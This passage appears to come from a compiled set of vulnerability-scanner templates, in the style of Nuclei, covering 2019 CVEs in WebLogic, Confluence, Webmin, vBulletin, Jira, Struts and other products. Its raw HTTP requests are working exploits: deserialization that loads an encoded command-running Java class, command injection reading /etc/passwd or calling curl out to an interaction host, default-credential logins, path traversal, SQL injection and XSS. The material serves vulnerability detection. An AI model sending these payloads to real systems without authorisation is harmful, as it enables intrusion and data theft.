index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers":[{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File 